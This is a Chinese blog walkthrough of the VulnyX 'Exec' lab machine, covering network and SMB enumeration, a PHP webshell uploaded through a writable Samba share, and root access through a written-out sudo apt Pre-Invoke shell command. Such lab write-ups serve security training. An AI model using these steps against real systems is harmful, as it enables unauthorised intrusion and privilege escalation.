vulnyx-Exec

Exec

靶机信息:

OS:Linux
Creator: s3cur4
Difficulty:Low
Release: 15 Apr 2024

信息收集

ip:192.168.56.106

1
2
3
4
5
6
7
8
9
arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:13:58:9c, IPv4: 192.168.56.103
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:16       (Unknown: locally administered)
192.168.56.100  08:00:27:d3:cc:65       PCS Systemtechnik GmbH
192.168.56.106  08:00:27:a9:a6:75       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.387 seconds (107.25 hosts/sec). 3 responded
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
map -sV -sC -Pn 192.168.56.106
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-21 01:33 CST
Nmap scan report for bogon (192.168.56.106)
Host is up (0.0015s latency).
Not shown: 996 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp  open  http        Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 08:00:27:A9:A6:75 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: EXEC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: -2s
| smb2-time: 
|   date: 2024-10-20T17:33:42
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.94 seconds

发现开放的有22,80,139,445端口。在浏览器访问下80端口试试看,发现是一个web网页。但这个页面没什么用处。

image-20241021021522212

扫一下看看没发现有什么有用的东西

image-20241021021711410

接下来就是看一下smbd服务,发现可以用smb服务

1
2
3
4
5
6
7
8
9
10
11
12
13
mbclient -L 192.168.56.106
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        server          Disk      Developer Directory
        IPC$            IPC       IPC Service (Samba 4.17.12-Debian)
        nobody          Disk      Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

接着上传一个文档看一下在web页面能不能访问

image-20241021022602661

1
2
3
4
5
6
7
8
9
10
11
12
smbclient //192.168.56.106/server
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Apr 15 16:45:54 2024
  ..                                  D        0  Mon Apr 15 16:04:12 2024
  index.html                          N    10701  Mon Apr 15 16:04:31 2024

                19480400 blocks of size 1024. 16496884 blocks available
smb: \> put 111.txt
putting file 111.txt as \111.txt (5.4 kb/s) (average 5.4 kb/s)
smb: \>

image-20241021022628734

发现上传文件是能正常访问的,上传一个webshell试一下能不能连接,可以发现用的编程语言是php

image-20241021023013445

接下来就是上传一个php的webshell

image-20241021023647843

image-20241021025339848

发现能拿到shell但是www-data用户, 查看一下passwd文件看一下其他的用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
s3cur4:x:1000:1000:s3cur4:/home/s3cur4:/bin/bash

提权

发现还有一个s3cur4用户,并不能直接登录到s3cur4用户,偶然间发现了www-data的sudo权限

image-20241021025834028

发现使用webshell执行提权命令会报错,接下来上传一个反弹shell的脚本进行提权

image-20241021032058173

接下来做一下免密登录,先用ssh-keygen命令生成ssh公钥和私钥在靶机和攻击机之间互传一下公钥,在攻击机上面实现一下免密登录

image-20241021033416213

查看user.txt

image-20241021033507666

提权至root

发现有apt的权限

image-20241021034053170

经过查找可以用这个https://gtfobins.github.io/gtfobins/apt/

image-20241021034538251

接着执行一下命令进行提权

1
sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

image-20241021040055270

接下来成功拿到root.txt

#vulnyx
vulnyx-Exec
https://www.mrdang.icu/2024/10/21/vulnyx-Exec/
作者
Mr.Dang
发布于
2024年10月21日
许可协议